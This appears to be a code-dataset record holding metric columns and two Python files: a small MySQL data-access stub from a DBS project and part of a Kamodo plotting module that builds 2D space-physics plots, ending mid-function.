| 0.628099
| 0
| 0
| 0.169682
| 0.011259
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057851
| null | null | 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38e268c3f36dfe630df417e05c92b52cd1c8661b
| 220
|
py
|
Python
|
Server/Python/src/dbs/dao/MySQL/PhysicsGroup/GetID.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/src/dbs/dao/MySQL/PhysicsGroup/GetID.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/src/dbs/dao/MySQL/PhysicsGroup/GetID.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
#!/usr/bin/env python
"""
This module provides PhysicsGroup.GetID data access object.
"""
from dbs.dao.Oracle.PhysicsGroup.GetID import GetID as OraPhysicsGroupGetID
class GetID(OraPhysicsGroupGetID):
    """MySQL PhysicsGroup.GetID DAO.

    Inherits the Oracle implementation unchanged -- no MySQL-specific
    overrides are needed for this query.
    """
    pass
| 22
| 75
| 0.754545
| 26
| 220
| 6.384615
| 0.807692
| 0.204819
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154545
| 220
| 9
| 76
| 24.444444
| 0.892473
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
2a0db1f5e718e6f4cc8e4d6d4d8e7ca1aa15c323
| 43,333
|
py
|
Python
|
kamodo_ccmc/readers/reader_kplots.py
|
asher-pembroke/Kamodo-1
|
7dd155d98661f663b3f71267f92208949f279db7
|
[
"NASA-1.3"
] | 6
|
2021-06-21T19:53:17.000Z
|
2021-08-19T14:09:36.000Z
|
kamodo_ccmc/readers/reader_kplots.py
|
asher-pembroke/Kamodo-1
|
7dd155d98661f663b3f71267f92208949f279db7
|
[
"NASA-1.3"
] | null | null | null |
kamodo_ccmc/readers/reader_kplots.py
|
asher-pembroke/Kamodo-1
|
7dd155d98661f663b3f71267f92208949f279db7
|
[
"NASA-1.3"
] | 1
|
2021-09-20T15:59:25.000Z
|
2021-09-20T15:59:25.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 2 15:58:53 2021
@author: rringuet
"""
#import numpy as np
from numpy import meshgrid, float32, float64, ravel, array, reshape
from kamodo import kamodofy, partial, Kamodo
def convert_to_array(value):
    '''Return *value* as a 1-D numpy array when it is a scalar or a list.

    Scalars (int, float, numpy float32/float64) are wrapped into a length-1
    array; flat lists become 1-D arrays; anything else (already an array,
    etc.) is returned unchanged.
    '''
    if isinstance(value, list):
        # Bug fix: array([value]) produced a (1, n) 2-D array for a flat
        # list, which broke the shape[0]==1 slice detection in plot2D.
        return array(value)
    if isinstance(value, (float, int, float32, float64)):
        return array([value])
    return value
def grid4D(kamodo_object, varname, time, c1, c2, c3):
    '''Evaluate the interpolator *varname* on kamodo_object over the full
    4-D grid spanned by time, c1, c2 and c3, flattened into an (N, 4)
    trajectory of coordinate rows.'''
    grids = meshgrid(time, c1, c2, c3, indexing='xy')
    traj = array([ravel(g) for g in grids]).T
    return getattr(kamodo_object, varname)(traj)
def grid3D(kamodo_object, varname, time, c1, c2):
    '''Evaluate the interpolator *varname* on kamodo_object over the full
    3-D grid spanned by time, c1 and c2, flattened into an (N, 3)
    trajectory of coordinate rows.'''
    grids = meshgrid(time, c1, c2, indexing='xy')
    traj = array([ravel(g) for g in grids]).T
    return getattr(kamodo_object, varname)(traj)
def plot2D(kamodo_object, varname, plottype, t, lon, lat, h=-1):
    '''Use Kamodo's native plotting to generate 2D plot.
    t, lon, lat, and h also double as t, x, y, and z for cartesian inputs.
    Possible plot types are LonLat, LatH, LonH, TimeLat, TimeLon, and TimeH for
    spherical coordinates; and TimeX, TimeY, TimeZ, XY, XZ, and YZ for
    cartesian coordinates.
    If the variable depends on 4 dimensions, h should be given.
    If a LonLat plot is requested, then the function expects a single value
    (integer, float, float32, or float64) for t and h (if h is given).
    In this case, lon and lat should be 1D arrays or flat lists. Similar
    data formatting is required for coordinates not plotted for all plot types.
    If the variable depends on height, then a value or array should be given for h.

    Parameters:
        kamodo_object: Kamodo object holding the functionalized variable.
        varname: variable name; a trailing 'ijk' selects the gridded interpolator.
        plottype: one of the plot type strings listed above.
        t, lon, lat, h: slice values (scalars) or axis arrays for the plot axes.
    Returns the figure produced by the temporary Kamodo object's .plot() call.
    '''
    #initialize new kamodo object
    plot_kamodo=Kamodo()
    #first, determine if kamodo function is griddified or not, and function units
    gridified = (varname[-3:]=='ijk')
    units = kamodo_object.variables[varname]['units']
    xvec = kamodo_object.variables[varname]['xvec']
    #next, determine vertical dependency of variable
    coord_list = list(xvec.keys())
    if len(coord_list)==4:
        vert = coord_list[-1] #height, ilev, ilev1, or milev (always last)
    else:
        vert='none'
        if 'H' in plottype:
            raise AttributeError(f'Cannot produce {plottype} plot for a variable '+\
                f'that does not depend on height.\n{varname}: {xvec}\n')
    #convert inputs to arrays
    t = convert_to_array(t)
    lon = convert_to_array(lon) #doubles as x
    lat = convert_to_array(lat) #doubles as y
    h = convert_to_array(h) #doubles as z
    #create printing message for heading of plot
    #print(varname, plottype, units, gridified, vert)
    if t.shape[0]==1: t_message = f'Time slice at {t[0]:.3f} hrs. '
    else: t_message=''
    if lon.shape[0]==1:
        if 'z' in vert: lon_message = f'X slice at {lon[0]:.3f} R_E. '
        else: lon_message = f'Longitude slice at {lon[0]:.3f} deg. '
    else: lon_message=''
    if lat.shape[0]==1:
        if 'z' in vert: lat_message = f'Y slice at {lat[0]:.3f} R_E. '
        else: lat_message = f'Latitude slice at {lat[0]:.3f} deg. '
    else: lat_message=''
    if vert=='none':
        h_message = ''
    elif h.shape[0]>1:
        h_message = ''
    else:
        if vert in ['ilev','ilev1','milev']: h_message = f'Pressure level slice at {h[0]}.'
        elif vert=='height': h_message = f'Height slice at {h[0]:.3f} km.'
        elif vert=='radius': h_message = f'Radius slice at {h[0]:.7f} R_E.'
        elif 'z' in vert: h_message = f'Z slice at {h[0]:.7f} R_E.'
    print(t_message+lon_message+lat_message+h_message)
    #create 2D kamodo function for plotting desired plottype with given function
    if gridified: #logic for plotting with gridified functions
        #LonLat plots
        if plottype=='LonLat':
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[2]:xvec[coord_list[2]]} #e.g. {'lon':'deg','lat':'deg'}
            #accounting for differing vertical dependencies
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,height=h)
                def pfunc(time, lon, lat, height):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
            # NOTE(review): 'if' here (not 'elif') restarts the chain; inconsistent
            # with the sibling branches -- confirm intended.
            if vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,radius=h)
                def pfunc(time, lon, lat, radius):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,ilev=h)
                def pfunc(time, lon, lat, ilev):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,ilev1=h)
                def pfunc(time, lon, lat, ilev1):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,milev=h)
                def pfunc(time, mlon, mlat, milev):
                    return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
                # NOTE(review): registration/return only happens inside the milev and
                # none branches here; the height/radius/ilev/ilev1 paths fall through
                # and the function returns None -- confirm this is intended.
                plot_kamodo['LonLat'] = pfunc
                return plot_kamodo.plot(LonLat=dict(mlat=lat,mlon=lon))
            elif vert=='none':
                if coord_list[1]=='Elon': #for ctipe 3D variables that depend on Elon and Elat
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(time=t)
                    def pfunc(time, Elon, Elat):
                        return getattr(kamodo_object, varname)(time=time,Elon=Elon,Elat=Elat)
                    plot_kamodo['LonLat'] = pfunc
                    return plot_kamodo.plot(LonLat=dict(Elat=lat,Elon=lon))
                else:
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(time=t)
                    def pfunc(time, lon, lat):
                        return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat)
                    plot_kamodo['LonLat'] = pfunc
                    return plot_kamodo.plot(LonLat=dict(lat=lat,lon=lon))
        #TimeLon plots
        elif plottype=='TimeLon':
            arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'lon':'deg'
            #accounting for differing vertical dependencies
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,height=h)
                def pfunc(time, lon, lat, height):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,radius=h)
                def pfunc(time, lon, lat, radius):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,ilev=h)
                def pfunc(time, lon, lat, ilev):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,ilev1=h)
                def pfunc(time, lon, lat, ilev1):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(mlat=lat,milev=h)
                def pfunc(time, mlon, mlat, milev):
                    return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
                plot_kamodo['TimeLon'] = pfunc
                return plot_kamodo.plot(TimeLon=dict(time=t,mlon=lon))
            elif vert=='none':
                if coord_list[1]=='Elon': #for ctipe 3D variables that depend on Elon and Elat
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(Elat=lat)
                    def pfunc(time, Elon, Elat):
                        return getattr(kamodo_object, varname)(time=time,Elon=Elon,Elat=Elat)
                    plot_kamodo['TimeLon'] = pfunc
                    return plot_kamodo.plot(TimeLon=dict(time=t,Elon=lon))
                else:
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(lat=lat)
                    def pfunc(time, lon, lat):
                        return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat)
                    plot_kamodo['TimeLon'] = pfunc
                    return plot_kamodo.plot(TimeLon=dict(time=t,lon=lon))
        #TimeLat plots
        elif plottype=='TimeLat':
            arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'lat':'deg'
            #accounting for differing vertical dependencies
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,height=h)
                def pfunc(time, lon, lat, height):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,radius=h)
                def pfunc(time, lon, lat, radius):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,ilev=h)
                def pfunc(time, lon, lat, ilev):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,ilev1=h)
                def pfunc(time, lon, lat, ilev1):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(mlon=lon,milev=h)
                def pfunc(time, mlon, mlat, milev):
                    return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
                plot_kamodo['TimeLat'] = pfunc
                return plot_kamodo.plot(TimeLat=dict(time=t,mlat=lat))
            elif vert=='none':
                if coord_list[1]=='Elon': #for ctipe 3D variables that depend on Elon and Elat
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(Elon=lon)
                    def pfunc(time, Elon, Elat):
                        return getattr(kamodo_object, varname)(time=time,Elon=Elon,Elat=Elat)
                    plot_kamodo['TimeLat'] = pfunc
                    return plot_kamodo.plot(TimeLat=dict(time=t,Elat=lat))
                else:
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(lon=lon)
                    def pfunc(time, lon, lat):
                        return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat)
                    plot_kamodo['TimeLat'] = pfunc
                    return plot_kamodo.plot(TimeLat=dict(time=t,lat=lat))
        #TimeH plots
        elif plottype=='TimeH':
            #accounting for differing vertical dependencies
            arg_units = {'time':'hr',coord_list[-1]:xvec[coord_list[-1]]} #'time':'hr', 'height':'km'
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, height):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,height=h))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, radius):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,radius=h))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, ilev):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,ilev=h))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, ilev1):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,ilev1=h))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(mlon=lon,mlat=lat)
                def pfunc(time, mlon, mlat, milev):
                    return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
                plot_kamodo['TimeH'] = pfunc
                return plot_kamodo.plot(TimeH=dict(time=t,milev=h))
            elif vert=='none':
                raise AttributeError('Variable does not depend on height.')
        #LonH plots
        elif plottype=='LonH':
            #accounting for differing vertical dependencies
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[-1]:xvec[coord_list[-1]]} #'lon':'deg', 'height':'km'
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, height):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,height=h))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, radius):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,radius=h))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, ilev):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,ilev=h))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lat=lat)
                def pfunc(time, lon, lat, ilev1):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(lon=lon,ilev1=h))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,mlat=lat)
                def pfunc(time, mlon, mlat, milev):
                    return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
                plot_kamodo['LonH'] = pfunc
                return plot_kamodo.plot(LonH=dict(mlon=lon,milev=h))
            elif vert=='none':
                raise AttributeError('Variable does not depend on height.')
        #LatH plots
        elif plottype=='LatH':
            #accounting for differing vertical dependencies
            arg_units = {coord_list[2]:xvec[coord_list[2]],
                         coord_list[-1]:xvec[coord_list[-1]]} #'lat':'deg', 'height':'km'
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, height):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,height=h))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, radius):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,radius=h))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, ilev):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,ilev=h))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,lon=lon)
                def pfunc(time, lon, lat, ilev1):
                    return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(lat=lat,ilev1=h))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,mlon=lon)
                def pfunc(time, mlon, mlat, milev):
                    return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
                plot_kamodo['LatH'] = pfunc
                return plot_kamodo.plot(LatH=dict(mlat=lat,milev=h))
            elif vert=='none':
                raise AttributeError('Variable does not depend on height.')
        #cartesian plots
        elif plottype=='TimeX':
            arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'X':'R_E'
            @kamodofy(units=units, arg_units=arg_units)
            @partial(y=lat,z=h)
            def pfunc(time, x, y, z):
                return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
            plot_kamodo['TimeX'] = pfunc
            return plot_kamodo.plot(TimeX=dict(time=t,x=lon))
        elif plottype=='TimeY':
            arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'X':'R_E'
            @kamodofy(units=units, arg_units=arg_units)
            @partial(x=lon,z=h)
            def pfunc(time, x, y, z):
                return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
            plot_kamodo['TimeY'] = pfunc
            return plot_kamodo.plot(TimeY=dict(time=t,y=lat))
        elif plottype=='TimeZ':
            arg_units={'time':'hr',coord_list[3]:xvec[coord_list[3]]} #'X':'R_E'
            @kamodofy(units=units, arg_units=arg_units)
            @partial(x=lon,y=lat)
            def pfunc(time, x, y, z):
                return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
            plot_kamodo['TimeZ'] = pfunc
            return plot_kamodo.plot(TimeZ=dict(time=t,z=h))
        elif plottype=='XY':
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[2]:xvec[coord_list[2]]} #e.g. {'x':'R_E','y':'R_E'}
            @kamodofy(units=units, arg_units=arg_units)
            @partial(time=t,z=h)
            def pfunc(time, x, y, z):
                return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
            plot_kamodo['XY'] = pfunc
            return plot_kamodo.plot(XY=dict(x=lon,y=lat))
        elif plottype=='XZ':
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[3]:xvec[coord_list[3]]} #e.g. {'x':'R_E','z':'R_E'}
            @kamodofy(units=units, arg_units=arg_units)
            @partial(time=t,y=lat)
            def pfunc(time, x, y, z):
                return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
            plot_kamodo['XZ'] = pfunc
            return plot_kamodo.plot(XZ=dict(x=lon,z=h))
        elif plottype=='YZ':
            arg_units = {coord_list[2]:xvec[coord_list[2]],
                         coord_list[3]:xvec[coord_list[3]]} #e.g. {'y':'R_E','z':'R_E'}
            @kamodofy(units=units, arg_units=arg_units)
            @partial(time=t,x=lon)
            def pfunc(time, x, y, z):
                return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
            plot_kamodo['YZ'] = pfunc
            return plot_kamodo.plot(YZ=dict(y=lat,z=h))
    else: #logic for plotting with not gridified function-----------------------------------------------------
        #LonLat plots
        if plottype=='LonLat':
            arg_units = {coord_list[1]:xvec[coord_list[1]],
                         coord_list[2]:xvec[coord_list[2]]} #{'lon':'deg','lat':'deg'}
            #accounting for differing vertical dependencies
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,height=h)
                def pfunc(time, lon, lat, height):
                    data = grid4D(kamodo_object, varname, time, lon, lat, height)
                    return reshape(data,(lon.shape[0],lat.shape[0]))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,radius=h)
                def pfunc(time, lon, lat, radius):
                    data = grid4D(kamodo_object, varname, time, lon, lat, radius)
                    return reshape(data,(lon.shape[0],lat.shape[0]))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,ilev=h)
                def pfunc(time, lon, lat, ilev):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
                    return reshape(data,(lon.shape[0],lat.shape[0]))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,ilev1=h)
                def pfunc(time, lon, lat, ilev1):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
                    return reshape(data,(lon.shape[0],lat.shape[0]))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(time=t,milev=h)
                def pfunc(time, mlon, mlat, milev):
                    data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
                    return reshape(data,(mlon.shape[0],mlat.shape[0]))
                # NOTE(review): as in the gridified branch, only milev/none register
                # and return; other verts fall through and return None -- confirm.
                plot_kamodo['LonLat'] = pfunc
                return plot_kamodo.plot(LonLat=dict(mlat=lat,mlon=lon))
            elif vert=='none':
                if coord_list[1]=='Elon':
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(time=t)
                    def pfunc(time, Elon, Elat):
                        data = grid3D(kamodo_object, varname, time, Elon, Elat)
                        return reshape(data,(Elon.shape[0],Elat.shape[0]))
                    plot_kamodo['LonLat'] = pfunc
                    return plot_kamodo.plot(LonLat=dict(Elat=lat,Elon=lon))
                else:
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(time=t)
                    def pfunc(time, lon, lat):
                        data = grid3D(kamodo_object, varname, time, lon, lat)
                        return reshape(data,(lon.shape[0],lat.shape[0]))
                    plot_kamodo['LonLat'] = pfunc
                    return plot_kamodo.plot(LonLat=dict(lat=lat,lon=lon))
        #TimeLon plots #####reshape command has reverse order b/c plots looked wrong for CTIPe
        elif plottype=='TimeLon':
            arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'lon':'deg'
            #accounting for differing vertical dependencies
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,height=h)
                def pfunc(time, lon, lat, height):
                    data = grid4D(kamodo_object, varname, time, lon, lat, height)
                    return reshape(data,(lon.shape[0],time.shape[0])).T
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,radius=h)
                def pfunc(time, lon, lat, radius):
                    data = grid4D(kamodo_object, varname, time, lon, lat, radius)
                    return reshape(data,(lon.shape[0],time.shape[0])).T
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,ilev=h)
                def pfunc(time, lon, lat, ilev):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
                    return reshape(data,(lon.shape[0],time.shape[0])).T
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lat=lat,ilev1=h)
                def pfunc(time, lon, lat, ilev1):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
                    return reshape(data,(lon.shape[0],time.shape[0])).T
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(mlat=lat,milev=h)
                def pfunc(time, mlon, mlat, milev):
                    data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
                    return reshape(data,(mlon.shape[0],time.shape[0])).T
                plot_kamodo['TimeLon'] = pfunc
                return plot_kamodo.plot(TimeLon=dict(time=t,mlon=lon))
            elif vert=='none':
                if coord_list[1]=='Elon':
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(Elat=lat)
                    def pfunc(time, Elon, Elat):
                        data = grid3D(kamodo_object, varname, time, Elon, Elat)
                        # NOTE(review): unlike the 4-D branches above, no .T here --
                        # confirm the transpose omission is deliberate.
                        return reshape(data,(Elon.shape[0],time.shape[0]))
                    plot_kamodo['TimeLon'] = pfunc
                    return plot_kamodo.plot(TimeLon=dict(time=t,Elon=lon))
                else:
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(lat=lat)
                    def pfunc(time, lon, lat):
                        data = grid3D(kamodo_object, varname, time, lon, lat)
                        return reshape(data,(lon.shape[0],time.shape[0]))
                    plot_kamodo['TimeLon'] = pfunc
                    return plot_kamodo.plot(TimeLon=dict(time=t,lon=lon))
        #TimeLat plots
        elif plottype=='TimeLat':
            arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'lat':'deg'
            #accounting for differing vertical dependencies
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,height=h)
                def pfunc(time, lon, lat, height):
                    data = grid4D(kamodo_object, varname, time, lon, lat, height)
                    return reshape(data,(time.shape[0],lat.shape[0]))
            elif vert=='radius':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,radius=h)
                def pfunc(time, lon, lat, radius):
                    data = grid4D(kamodo_object, varname, time, lon, lat, radius)
                    return reshape(data,(time.shape[0],lat.shape[0]))
            elif vert=='ilev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,ilev=h)
                def pfunc(time, lon, lat, ilev):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev)
                    return reshape(data,(time.shape[0],lat.shape[0]))
            elif vert=='ilev1':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,ilev1=h)
                def pfunc(time, lon, lat, ilev1):
                    data = grid4D(kamodo_object, varname, time, lon, lat, ilev1)
                    return reshape(data,(time.shape[0],lat.shape[0]))
            elif vert=='milev':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(mlon=lon,milev=h)
                def pfunc(time, mlon, mlat, milev):
                    data = grid4D(kamodo_object, varname, time, mlon, mlat, milev)
                    return reshape(data,(time.shape[0],mlat.shape[0]))
                plot_kamodo['TimeLat'] = pfunc
                return plot_kamodo.plot(TimeLat=dict(time=t,mlat=lat))
            elif vert=='none':
                if coord_list[1]=='Elon':
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(Elon=lon)
                    def pfunc(time, Elon, Elat):
                        data = grid3D(kamodo_object, varname, time, Elon, Elat)
                        return reshape(data,(time.shape[0],Elat.shape[0]))
                    plot_kamodo['TimeLat'] = pfunc
                    return plot_kamodo.plot(TimeLat=dict(time=t,Elat=lat))
                else:
                    @kamodofy(units=units, arg_units=arg_units)
                    @partial(lon=lon)
                    def pfunc(time, lon, lat):
                        data = grid3D(kamodo_object, varname, time, lon, lat)
                        return reshape(data,(time.shape[0],lat.shape[0]))
                    plot_kamodo['TimeLat'] = pfunc
                    return plot_kamodo.plot(TimeLat=dict(time=t,lat=lat))
        #TimeH plots
        elif plottype=='TimeH':
            #accounting for differing vertical dependencies
            arg_units = {'time':'hr',coord_list[-1]:xvec[coord_list[-1]]} #'time':'hr', 'height':'km'
            if vert=='height':
                @kamodofy(units=units, arg_units=arg_units)
                @partial(lon=lon,lat=lat)
                def pfunc(time, lon, lat, height):
